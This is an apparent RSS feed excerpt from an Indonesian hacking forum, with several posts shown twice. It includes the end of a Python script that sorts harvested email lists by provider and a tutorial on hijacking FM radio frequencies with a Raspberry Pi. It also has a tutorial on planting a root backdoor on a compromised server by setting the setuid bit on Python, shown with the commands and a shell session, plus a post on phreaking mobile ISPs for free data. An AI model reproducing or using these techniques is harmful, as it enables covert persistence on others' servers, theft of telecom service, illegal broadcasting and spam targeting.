__  /|_/ /_  __ `/_  /__  / __  /_   __  /__  /_  __/  _ &#92;_  ___/<br />
_  /  / / / /_/ /_  / _  /___  __/   _  / _  / / /_ /  __/  /<br />
/_/  /_/  &#92;__,_/ /_/  /_____/_/      /_/  /_/  &#92;__/ &#92;___//_/<br />
                                                       v.01<br />
%s<br />
[+] Author      : Ruitze<br />
[+] Tool        : MailFilter v.01<br />
[+] Description : Filter mailist Gmail, Yahoo, Hotmail<br />
[+] Usage       : python mailFilter.py nameMailist -o %s''' % (warna.ijo,warna.putih, warna.cetak))<br />
<br />
<br />
<br />
<br />
regex = re.compile(r'''(<br />
                   ([a-zA-Z0-9._%+-]+)<br />
                    @<br />
                    (gmail|yahoo|hotmail)<br />
                    (&#92;.com)<br />
                    )''', re.VERBOSE)<br />
<br />
def file_to_str(filename):<br />
    with open(filename) as f:<br />
        return f.read().lower()<br />
<br />
def get_emails(s):<br />
    return (email[0] for email in re.findall(regex, s) if not email[0].startswith('//'))<br />
<br />
def main():<br />
    parser = OptionParser()<br />
    parser.add_option('-o','--output',dest='output',help='output file to saveFile.txt', action='store_true')<br />
    (options, args) = parser.parse_args()<br />
    try:<br />
        if args and options.output:<br />
            for arg in args:<br />
                if os.path.isfile(arg):<br />
                    for email in get_emails(file_to_str(arg)):<br />
                        if 'gmail' in email:<br />
                            f =open('gmailFile.txt', 'a')<br />
                            f.write(email+'&#92;n')<br />
                            f.close()<br />
                        elif 'yahoo' in email:<br />
                            f = open('yahooFile.txt', 'a')<br />
                            f.write(email + '&#92;n')<br />
                            f.close()<br />
                        else:<br />
                            f = open('hotmailFile.txt', 'a')<br />
                            f.write(email + '&#92;n')<br />
                            f.close()<br />
                    author()<br />
                    print(warna.cetak)<br />
                    print('%s[+] Succes filter to gmailFile.txt   [+]%s' % (warna.biru, warna.cetak))<br />
                    print('%s[+] Succes filter to yahooFile.txt   [+]%s' % (warna.kuning, warna.cetak))<br />
                    print('%s[+] Succes filter to hotmailFile.txt [+]%s' % (warna.abang, warna.cetak))<br />
                else:<br />
                    print('"{}" is not a file.').format(arg)<br />
<br />
        else:<br />
            author()<br />
            print(warna.cetak)<br />
    except Exception as e:<br />
        print('Error Description', e)<br />
<br />
<br />
if __name__=='__main__':<br />
    main()</code></div></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[BackBox tidak bisa mati (shutdown malah jadi restart)]]></title>
			<link>https://www.backboxindonesia.or.id/thread-237.html</link>
			<pubDate>Sun, 11 Feb 2018 15:55:29 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-237.html</guid>
			<description><![CDATA[ada yang ngalamin kaya gini? share dong udah ane coba edit grub nya tapi tetep aja , matiin pake init 0 ,shutdown juga hasilnya sama]]></description>
			<content:encoded><![CDATA[ada yang ngalamin kaya gini? share dong udah ane coba edit grub nya tapi tetep aja , matiin pake init 0 ,shutdown juga hasilnya sama]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[MEDUSA Couldn't load "ssh" bagaimana cara ngatasinnya ?]]></title>
			<link>https://www.backboxindonesia.or.id/thread-234.html</link>
			<pubDate>Wed, 17 Jan 2018 06:25:16 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-234.html</guid>
			<description><![CDATA[<img src="https://imghost.io/images/2018/01/17/as.png" alt="[Image: as.png]" class="mycode_img" />]]></description>
			<content:encoded><![CDATA[<img src="https://imghost.io/images/2018/01/17/as.png" alt="[Image: as.png]" class="mycode_img" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Membajak frekuensi radio menggunakan raspberry pi dan kawat]]></title>
			<link>https://www.backboxindonesia.or.id/thread-233.html</link>
			<pubDate>Sun, 10 Dec 2017 07:11:15 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-233.html</guid>
			<description><![CDATA[Okay gus kali ini saya akan coba sedikit sharing ilmu mengenai frekuensi..<br />
Sebelum memasukin isi threads kali ini saya ingin menyampaikan DISCLAIMER terlebih dahulu..<br />
<br />
Karena pembahasan kali ini agak sedikit melanggar aturan yang ada di negeri ini, harapan saya dengan adanya thread kali ini tidak ada orang yang menyakalahgunakan cara yang saya share di sini. Thread ini sifatnya adalah untuk pembelajaran saja, kalo ada orang yang menyalah gunakan cara yang telah di share di thread ini saya tidak bertanggung jawab. Karena di sini saya niatnya untuk membagikan ilmu pengetahuan kepada siapa saja yang ingin bejalar di forum ini.<br />
<br />
Okay tanpa basa basi lagi saya akan coba praktekkan langkah" nya.<br />
Sebelum masuk ke materi kali ini kita harus siapkan terlebih dahulu "Raspberry pi" dan "Kawat" nya. Kalo belum punya, kita bisa beli di toko online seperti tokopedia dll.<br />
<br />
Setelah kita mempersiapkan raspberry nya kita coba install aplikasi untuk mengirim suara ke dalam frekuensi namanya yaitu <a href="https://github.com/markondej/fm_transmitter" target="_blank" class="mycode_url">fm_transmiter</a><br />
Untuk cara installasinya cukup mudah, kita cukup ketikan perintah ini di terminal raspberry pi kita.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo apt-get install make gcc g++<br />
&#36; git clone https://github.com/markondej/fm_transmitter<br />
&#36; cd fm_transmitter<br />
&#36; sudo make<br />
&#36; sudo cp fm_transmitter /usr/bin/fm_transmitter</code></div></div><br />
Setelah fm_transmitter nya terinstall di raspberry, langkah selanjutnya kita tempelkan kawat besi atau tembaga ke dalam pin "GPIO 4" raspberry pi nya. Kalo kurang jelas bisa di lihat di sini skemanya.<br />
<br />
<img src="https://i.stack.imgur.com/yWGmW.png" alt="[Image: yWGmW.png]" class="mycode_img" /><br />
<br />
Setelah itu kita eksekusi saja tools yang sudah kita install tadi. Sebagai contoh, perintahnya seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo fm_transmitter -f 103.800 -r sound.wav</code></div></div><br />
Penjelasan:<br />
-f = Frekuensi yang akan kita injeksi<br />
-r = Nama file yang akan kita transmit ke frekuensi<br />
<br />
Cukup mudah bukan caranya??<br />
Kalo kalian kurang jelas dalam penggunaan nya bisa lihat video di bawah ini.<br />
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/eiA8ItrWGhE" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
Okay mungkin seperti itu cara yang bisa kita lakunan untuk membajak frekuensi radio menggunakan raspberry pi.<br />
Mohon maaf kalo ada kata yang kurang jelas.<br />
Akhir kata, wasalam =))]]></description>
			<content:encoded><![CDATA[Okay gus kali ini saya akan coba sedikit sharing ilmu mengenai frekuensi..<br />
Sebelum memasukin isi threads kali ini saya ingin menyampaikan DISCLAIMER terlebih dahulu..<br />
<br />
Karena pembahasan kali ini agak sedikit melanggar aturan yang ada di negeri ini, harapan saya dengan adanya thread kali ini tidak ada orang yang menyakalahgunakan cara yang saya share di sini. Thread ini sifatnya adalah untuk pembelajaran saja, kalo ada orang yang menyalah gunakan cara yang telah di share di thread ini saya tidak bertanggung jawab. Karena di sini saya niatnya untuk membagikan ilmu pengetahuan kepada siapa saja yang ingin bejalar di forum ini.<br />
<br />
Okay tanpa basa basi lagi saya akan coba praktekkan langkah" nya.<br />
Sebelum masuk ke materi kali ini kita harus siapkan terlebih dahulu "Raspberry pi" dan "Kawat" nya. Kalo belum punya, kita bisa beli di toko online seperti tokopedia dll.<br />
<br />
Setelah kita mempersiapkan raspberry nya kita coba install aplikasi untuk mengirim suara ke dalam frekuensi namanya yaitu <a href="https://github.com/markondej/fm_transmitter" target="_blank" class="mycode_url">fm_transmiter</a><br />
Untuk cara installasinya cukup mudah, kita cukup ketikan perintah ini di terminal raspberry pi kita.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo apt-get install make gcc g++<br />
&#36; git clone https://github.com/markondej/fm_transmitter<br />
&#36; cd fm_transmitter<br />
&#36; sudo make<br />
&#36; sudo cp fm_transmitter /usr/bin/fm_transmitter</code></div></div><br />
Setelah fm_transmitter nya terinstall di raspberry, langkah selanjutnya kita tempelkan kawat besi atau tembaga ke dalam pin "GPIO 4" raspberry pi nya. Kalo kurang jelas bisa di lihat di sini skemanya.<br />
<br />
<img src="https://i.stack.imgur.com/yWGmW.png" alt="[Image: yWGmW.png]" class="mycode_img" /><br />
<br />
Setelah itu kita eksekusi saja tools yang sudah kita install tadi. Sebagai contoh, perintahnya seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo fm_transmitter -f 103.800 -r sound.wav</code></div></div><br />
Penjelasan:<br />
-f = Frekuensi yang akan kita injeksi<br />
-r = Nama file yang akan kita transmit ke frekuensi<br />
<br />
Cukup mudah bukan caranya??<br />
Kalo kalian kurang jelas dalam penggunaan nya bisa lihat video di bawah ini.<br />
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/eiA8ItrWGhE" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
Okay mungkin seperti itu cara yang bisa kita lakunan untuk membajak frekuensi radio menggunakan raspberry pi.<br />
Mohon maaf kalo ada kata yang kurang jelas.<br />
Akhir kata, wasalam =))]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Tanam rootkit tanpa menambahkan file/rootkit ke dalam server]]></title>
			<link>https://www.backboxindonesia.or.id/thread-232.html</link>
			<pubDate>Sat, 18 Nov 2017 10:25:36 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-232.html</guid>
			<description><![CDATA[Oke kali ini saya coba sharing trik sederhana cara menanam rootkit tanpa upload rootkit/file ke dalam server.<br />
Gimana caranya?? Ko bisa?? Penasaran bukan??<br />
<br />
Mungkin bagi kalian yang terbiasa menggunakan python trik ini sangatlah mudah dan sangat sederhana, kita tinggal menambahkan hak akses sticky bit ke dalam suatu file. Dalam contoh kali ini saya menambahkan hak akses sticky bit ke dalam file python sendiri.<br />
Caranya cukup mudah, kita tinggal ketikan perintah "chmod +s" menggunakan user root. Sebagai contoh perintahnya seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; chmod +s /usr/bin/python2.7</code></div></div><br />
Lalu apa yang harus kita lakukan setelah merubah hak akses file tersebut??<br />
Caranya kita tinggal masuk ke shell interactive python kemudian kita setuid menjadi 0. Perintahnya kurang lebih seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; id<br />
uid=1000(user) gid=1000(user) groups=1000(user)<br />
&#36; python<br />
Python 2.7.14 (default, Sep 23 2017, 22:06:14) <br />
[GCC 7.2.0] on linux2<br />
Type "help", "copyright", "credits" or "license" for more information.<br />
&gt;&gt;&gt; import os<br />
&gt;&gt;&gt; os.setuid(0)<br />
&gt;&gt;&gt; os.setgid(0)<br />
&gt;&gt;&gt; os.system('id')<br />
uid=0(root) gid=0(root) groups=0(root),1000(user)<br />
&gt;&gt;&gt; os.system('/bin/bash')<br />
&#36; id<br />
uid=0(root) gid=0(root) groups=0(root),1000(user)</code></div></div><br />
Cukup mudah bukan??<br />
Sebelumnya saya pernah share juga cara menanam rootkit ke dalam server dengan mengupload program suid <a href="http://www.backboxindonesia.or.id/thread-182.html" target="_blank" class="mycode_url">di sini</a>. Kali ini caranya cukup sederhana banget bukan. :)<br />
<br />
Catetan : karena kita menambahkan hak akses ke dalam program python, kita harus cek terlebih dahulu apakah di server target sudah terinstall python atau belum. kalo belum kita tinggal install saja pythonnya, kan udah dapet akses rootnya??<br />
Atau kalo kalian pengen nginjeksi ke perl, bash, atau yang lainnya juga bisa ko :) tinggal atur" aja enaknya kita simpen di mana rootkit. hehe<br />
<br />
Mungkin cukup sekian tutorial dari saya.<br />
Semoga tutorialnya bermanfaat. :)]]></description>
			<content:encoded><![CDATA[Oke kali ini saya coba sharing trik sederhana cara menanam rootkit tanpa upload rootkit/file ke dalam server.<br />
Gimana caranya?? Ko bisa?? Penasaran bukan??<br />
<br />
Mungkin bagi kalian yang terbiasa menggunakan python trik ini sangatlah mudah dan sangat sederhana, kita tinggal menambahkan hak akses sticky bit ke dalam suatu file. Dalam contoh kali ini saya menambahkan hak akses sticky bit ke dalam file python sendiri.<br />
Caranya cukup mudah, kita tinggal ketikan perintah "chmod +s" menggunakan user root. Sebagai contoh perintahnya seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; chmod +s /usr/bin/python2.7</code></div></div><br />
Lalu apa yang harus kita lakukan setelah merubah hak akses file tersebut??<br />
Caranya kita tinggal masuk ke shell interactive python kemudian kita setuid menjadi 0. Perintahnya kurang lebih seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; id<br />
uid=1000(user) gid=1000(user) groups=1000(user)<br />
&#36; python<br />
Python 2.7.14 (default, Sep 23 2017, 22:06:14) <br />
[GCC 7.2.0] on linux2<br />
Type "help", "copyright", "credits" or "license" for more information.<br />
&gt;&gt;&gt; import os<br />
&gt;&gt;&gt; os.setuid(0)<br />
&gt;&gt;&gt; os.setgid(0)<br />
&gt;&gt;&gt; os.system('id')<br />
uid=0(root) gid=0(root) groups=0(root),1000(user)<br />
&gt;&gt;&gt; os.system('/bin/bash')<br />
&#36; id<br />
uid=0(root) gid=0(root) groups=0(root),1000(user)</code></div></div><br />
Cukup mudah bukan??<br />
Sebelumnya saya pernah share juga cara menanam rootkit ke dalam server dengan mengupload program suid <a href="http://www.backboxindonesia.or.id/thread-182.html" target="_blank" class="mycode_url">di sini</a>. Kali ini caranya cukup sederhana banget bukan. :)<br />
<br />
Catetan : karena kita menambahkan hak akses ke dalam program python, kita harus cek terlebih dahulu apakah di server target sudah terinstall python atau belum. kalo belum kita tinggal install saja pythonnya, kan udah dapet akses rootnya??<br />
Atau kalo kalian pengen nginjeksi ke perl, bash, atau yang lainnya juga bisa ko :) tinggal atur" aja enaknya kita simpen di mana rootkit. hehe<br />
<br />
Mungkin cukup sekian tutorial dari saya.<br />
Semoga tutorialnya bermanfaat. :)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[VPN GRATIS Dengan Layanan PORT FORWARDING]]></title>
			<link>https://www.backboxindonesia.or.id/thread-231.html</link>
			<pubDate>Sat, 18 Nov 2017 04:26:43 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-231.html</guid>
			<description><![CDATA[Sudah banyak yang tahu tentang <a href="https://ngrok.com" target="_blank" class="mycode_url">NGROK</a> kan? Yah, Ngrok memang gratis. Tapi amat disayangkan port Ngrok selalu berganti bagi user gratisan. Solusinya adalah dengan menggunakan <a href="https://tunnel.my.id" target="_blank" class="mycode_url">TUNNEL.MY.ID</a><br />
Jika tidak salah, situs <a href="https://tunnel.my.id" target="_blank" class="mycode_url">TUNNEL.MY.ID</a> ini dibuat oleh <a href="https://facebook.com/me.kangarie" target="_blank" class="mycode_url">KangArie</a>.<br />
<br />
<hr class="mycode_hr" />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Q&amp;A</span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Untuk siapa layanan vpn port forward, vpn interkoneksi, dan HTTP reserve proxy?</span></span></span><br />
</span><br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Untuk router yang koneksi internetnya tidak memiliki akses ke IP Public</span></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Apa contoh router yang ga dpt akses ke IP public?</span></span></span></span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Pengguna Modem GSM/CDMA, pengguna wifi.id, client rt/rw net</span></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Ini untuk internet gratis atau menghemat quota?</span></span></span></span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Bukan</span></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Ini untuk traffic keluar, misal utk main game atau browsing atau ganti ip public?</span></span></span></span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Bukan</span></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Apakah ada quota utk tunnel DNS?</span></span></span></span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Tidak ada</span></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Kapan akun vpn akan dihapus?</span></span></span></span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Jika anda free member, maka sistem akan menghapus akun vpn jika selama seminggu vpn tidak aktif</span></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Apakah layanan ini gratis?</span></span></span></span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Ya, server US free. Sedangkan server ID berbayar. Untuk DDNS dan Userman gratis</span></span></span><br />
<br />
<hr class="mycode_hr" />
<br />
Nah begitulah kira - kira. Ane sempet dokumentasiin dikit pas nyoba buat port forward Apache.<br />
Langsung saja deh kalian simak video dibawah ini.<br />
<br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/0nm4e3bmgRM" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>
<br />
Oke sekian gitu aja, semoga bermanfaat!]]></description>
			<content:encoded><![CDATA[Sudah banyak yang tahu tentang <a href="https://ngrok.com" target="_blank" class="mycode_url">NGROK</a> kan? Yah, Ngrok memang gratis. Tapi amat disayangkan port Ngrok selalu berganti bagi user gratisan. Solusinya adalah dengan menggunakan <a href="https://tunnel.my.id" target="_blank" class="mycode_url">TUNNEL.MY.ID</a><br />
Jika tidak salah, situs <a href="https://tunnel.my.id" target="_blank" class="mycode_url">TUNNEL.MY.ID</a> ini dibuat oleh <a href="https://facebook.com/me.kangarie" target="_blank" class="mycode_url">KangArie</a>.<br />
<br />
<hr class="mycode_hr" />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Q&amp;A</span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Untuk siapa layanan vpn port forward, vpn interkoneksi, dan HTTP reserve proxy?</span></span></span><br />
</span><br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Untuk router yang koneksi internetnya tidak memiliki akses ke IP Public</span></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Apa contoh router yang ga dpt akses ke IP public?</span></span></span></span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Pengguna Modem GSM/CDMA, pengguna wifi.id, client rt/rw net</span></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Ini untuk internet gratis atau menghemat quota?</span></span></span></span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Bukan</span></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Ini untuk traffic keluar, misal utk main game atau browsing atau ganti ip public?</span></span></span></span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Bukan</span></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Apakah ada quota utk tunnel DNS?</span></span></span></span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Tidak ada</span></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Kapan akun vpn akan dihapus?</span></span></span></span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Jika anda free member, maka sistem akan menghapus akun vpn jika selama seminggu vpn tidak aktif</span></span></span><br />
<br />
<br />
<br />
<br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b">Q: Apakah layanan ini gratis?</span></span></span></span><br />
<br />
<span style="color: #ccffff;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial;" class="mycode_font">A: Ya, server US free. Sedangkan server ID berbayar. Untuk DDNS dan Userman gratis</span></span></span><br />
<br />
<hr class="mycode_hr" />
<br />
Nah begitulah kira - kira. Ane sempet dokumentasiin dikit pas nyoba buat port forward Apache.<br />
Langsung saja deh kalian simak video dibawah ini.<br />
<br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/0nm4e3bmgRM" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>
<br />
Oke sekian gitu aja, semoga bermanfaat!]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Phreaking with OpenWRT]]></title>
			<link>https://www.backboxindonesia.or.id/thread-230.html</link>
			<pubDate>Thu, 09 Nov 2017 18:31:53 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-230.html</guid>
			<description><![CDATA[Mumpung sedang nganggur dan suntuk gatau mau ngapain, mendingan nulis di forum ya kan. Nulis dikit lah gapapa.<br />
Oke jadi mungkin udah pada ga asing lagi sama yang namanya OpenWRT. Apaan sih? Cari tau aja di situs <a href="https://openwrt.org/" target="_blank" class="mycode_url">OpenWRT</a> langsung.<br />
Intinya dengan OpenWRT yang OpenSource ini kita bisa ngerubah router menjadi lebih dari sekedar router, maksudnya router itu bisa dikembangkan lagi, misalnya untuk keperluan IoT Device, Web Server, File Sharing Server, CCTV, Print Server, Music Player Server, Downloader Server, dsb. Nah dalam thread kali ini kita bakalan gunain untuk kepentingan Phreaking (baca: gretongan).<br />
<br />
Penampakan HG553<br />
<br />
<img src="https://scontent-sin6-1.xx.fbcdn.net/v/t31.0-8/fr/cp0/e15/q65/23509015_1483883955052357_8830691203396411904_o.jpg?efg=eyJpIjoiYiJ9&amp;oh=0567d9693acff66bc01e81c0eb87ef63&amp;oe=5AA3ADF5" alt="[Image: 23509015_1483883955052357_88306912033964...e=5AA3ADF5]" class="mycode_img" /><br />
<br />
<br />
Kenapa phreaking pake Router ber-OpenWRT?<br />
Phreaking ISP GSM biasanya dilakukan di HP/Komputer. Artinya HP/Komputer perlu nyala terus cuma buat kegiatan phreaking. Dengan melakukan phreaking di router ber-OpenWRT yang memang salah satu tugasnya adalah untuk selalu menyala, maka Laptop udah gaperlu nyala secara nonstop lagi, kasihan kan kalo dipaksa nyala nonstop. Lalu phreaking biasanya menuntut Laptop/HP untuk menjalankan beberapa tools program yang dibutuhkan (misalnya pakai HTTP Injector, Inject PC, Bitvise, KPN Tunnel, Psiphone, dsb) yang tentunya ini bikin risih, sekaligus memakan resource Laptop/HP yang ada, makanya kita pake router ber-OpenWRT supaya Laptop/HP kita tinggal connect saja via WiFi si router (atau kabel LAN) tanpa perlu menjalankan tools program tambahan. Jadi, soal tugas phreaking akan benar-benar didedikasikan oleh si router saja.<br />
<br />
<br />
Alat :<br />
- Huawei HG553 Wireless Router (WAJIB)<br />
- Sierra312U USB Modem (atau modem lain)<br />
- SIM Card dengan ISP yang lagi bisa dipake gretongan (misal : Tri)<br />
Bahan :<br />
- Firmware LEDE <a href="http://pulpstone.pw/wp-content/uploads/firmware/lede/17.01.4/brcm63xx/pulpstone-lede-17.01.4-brcm63xx-generic-HG553-squashfs-cfe.bin" target="_blank" class="mycode_url">Pulpstone</a> (<a href="http://pulpstone.pw/wp-content/uploads/firmware/lede/17.01.4/brcm63xx/READ_ME.txt" target="_blank" class="mycode_url">TUTOR FLASHING</a>)<br />
- Firmware <a href="https://goo.gl/CFW1s2" target="_blank" class="mycode_url">OpenWRT CC Angel Beats</a> (Tutor ada didalam file)<br />
- Akun SSH/VPN (misalnya dari <a href="http://fastssh.com/" target="_blank" class="mycode_url">FastSSH</a>)<br />
- Payload<br />
<br />
Tata cara flash, jika HG553 kalian masih pakai firmware original :<br />
Flash LEDE Pulpstone pakai opsi Firmware Upgrade &gt; lalu Flash OpenWRT CC Angel Beats<br />
<br />
Semua tutor lengkap Flash udah tertera di file firmware yang kalian download diatas, jadi budayakan membaca!<br />
<br />
<br />
<br />
Proof :<br />
<br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/hN6SIh55Tkg" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>
<br />
<br />
Oke sekian seperti itu saja. Semoga bermanfaat.]]></description>
			<content:encoded><![CDATA[Mumpung sedang nganggur dan suntuk gatau mau ngapain, mendingan nulis di forum ya kan. Nulis dikit lah gapapa.<br />
Oke jadi mungkin udah pada ga asing lagi sama yang namanya OpenWRT. Apaan sih? Cari tau aja di situs <a href="https://openwrt.org/" target="_blank" class="mycode_url">OpenWRT</a> langsung.<br />
Intinya dengan OpenWRT yang OpenSource ini kita bisa ngerubah router menjadi lebih dari sekedar router, maksudnya router itu bisa dikembangkan lagi, misalnya untuk keperluan IoT Device, Web Server, File Sharing Server, CCTV, Print Server, Music Player Server, Downloader Server, dsb. Nah dalam thread kali ini kita bakalan gunain untuk kepentingan Phreaking (baca: gretongan).<br />
<br />
Penampakan HG553<br />
<br />
<img src="https://scontent-sin6-1.xx.fbcdn.net/v/t31.0-8/fr/cp0/e15/q65/23509015_1483883955052357_8830691203396411904_o.jpg?efg=eyJpIjoiYiJ9&amp;oh=0567d9693acff66bc01e81c0eb87ef63&amp;oe=5AA3ADF5" alt="[Image: 23509015_1483883955052357_88306912033964...e=5AA3ADF5]" class="mycode_img" /><br />
<br />
<br />
Kenapa phreaking pake Router ber-OpenWRT?<br />
Phreaking ISP GSM biasanya dilakukan di HP/Komputer. Artinya HP/Komputer perlu nyala terus cuma buat kegiatan phreaking. Dengan melakukan phreaking di router ber-OpenWRT yang memang salah satu tugasnya adalah untuk selalu menyala, maka Laptop udah gaperlu nyala secara nonstop lagi, kasihan kan kalo dipaksa nyala nonstop. Lalu phreaking biasanya menuntut Laptop/HP untuk menjalankan beberapa tools program yang dibutuhkan (misalnya pakai HTTP Injector, Inject PC, Bitvise, KPN Tunnel, Psiphone, dsb) yang tentunya ini bikin risih, sekaligus memakan resource Laptop/HP yang ada, makanya kita pake router ber-OpenWRT supaya Laptop/HP kita tinggal connect saja via WiFi si router (atau kabel LAN) tanpa perlu menjalankan tools program tambahan. Jadi, soal tugas phreaking akan benar-benar didedikasikan oleh si router saja.<br />
<br />
<br />
Alat :<br />
- Huawei HG553 Wireless Router (WAJIB)<br />
- Sierra312U USB Modem (atau modem lain)<br />
- SIM Card dengan ISP yang lagi bisa dipake gretongan (misal : Tri)<br />
Bahan :<br />
